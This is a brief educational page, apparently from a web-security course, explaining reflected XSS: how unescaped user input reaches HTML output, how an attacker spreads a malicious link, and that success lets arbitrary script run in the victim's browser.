Analysis and Exploration of Vulnerabilities

Reflected XSS

The application or API includes unvalidated and unescaped user input as part of HTML output.

  • That is, the HTML displays a string sent by the user.

The attacker will send a malicious link to the victim, pointing to an attacker-controlled page.

  • Through email, posted on a chat, etc..

A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser.

PreviousPrevalence and DetectabilityNextStored XSS

Last updated